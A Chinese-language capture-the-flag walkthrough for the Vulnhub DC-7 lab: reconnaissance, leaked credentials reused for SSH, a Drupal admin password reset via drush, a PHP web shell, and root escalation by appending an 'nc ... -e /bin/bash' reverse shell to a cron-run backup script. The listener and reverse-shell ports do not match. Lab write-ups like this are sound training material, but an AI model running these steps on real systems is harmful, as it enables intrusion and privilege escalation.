Vulnhub渗透靶机系列----DC7
下载地址
http://www.five86.com/downloads/DC-7.zip
https://download.vulnhub.com/dc/DC-7.zip
环境说明
dc7靶机:10.139.10.147
kali攻击机:10.139.10.152
信息收集
查看存活主机
sudo netdiscover 10.139.10.0/24
对比mac地址得知ip为10.139.10.147
nmap扫端口
sudo namp -sS -sV -A -n 10.139.10.147
可以看到存在80端口和22端口
访问80,又是drual框架,还有提示,大概意思就是暴力破解不行了,找新思路
DC-7 introduces some "new" concepts, but I'll leave you to figure out what they are. :-)
While this challenge isn't all that technical, if you need to resort to brute forcing or a dictionary attacks, you probably won't succeed.
What you will have to do, is to think "outside" the box.
Way "outside" the box. :-)
指纹识别
可以看到是drupal
发现右下角有作者名字
源码泄露
bing搜索DC7USER
在他的代码里找到相关配置账密
username:dc7user
password:MdR3xOgB7#dW
漏洞利用
ssh登录
刚开始尝试了登录网站,发现登录失败。
然后尝试ssh远程登录
ssh dc7user@10.139.10.147
不要忽略有mail
发现backups和mox两个文件,打开backups文件发现,这两个乱码打不开
在mail发现backups.sh文件
查看该文件,发现drush命令
drush命令:是drupal专属的一个操作系统命令
修改网站密码
chatgpt渗透(dog),提示我们去根目录输入命令
drush user:password admin --password="123456"
成功修改
然后拿admin去登录网站
获取shell
刚开始Content—>Add content–>Basic page下写木马,发现这个框架不支持php,可以去下载个php的扩展
在Manage–extend,
https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz
第一次失败了,再来了一次就行了
成功安装
还是那个页面,选上php页面最后安装,开始写shell
在刚开始的content页面选php格式写shell,同时kali监听,然后点save,会自动反弹到shell
nc -lnvp 4444
开启python交互
python -c 'import pty;pty.spawn("/bin/bash")'
提权
在/opt/scripts
目录下的backups.sh
脚本文件所属组是www-data
,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell
我们从前面知道这个脚本是有root权限的,那么在里面写的反弹shell也是root权限
写入计划任务,同时监听4444端口,因为是计划任务,所有需要等待时间,不能直接以当前身份执行那个文件,那样弹出来的不是root,而是当前的www-data权限
nc -lnvp 4444
echo "nc 10.139.10.152 4445 -e /bin/bash" >>/opt/scripts/backups.sh
```![在这里插入图片描述](https://img-blog.csdnimg.cn/1788b68b8da14f94a37b1c98bcdb38dd.png)
拿到flag
![在这里插入图片描述](https://img-blog.csdnimg.cn/50e5a6f70c504f578ddd438ef74e1f52.png)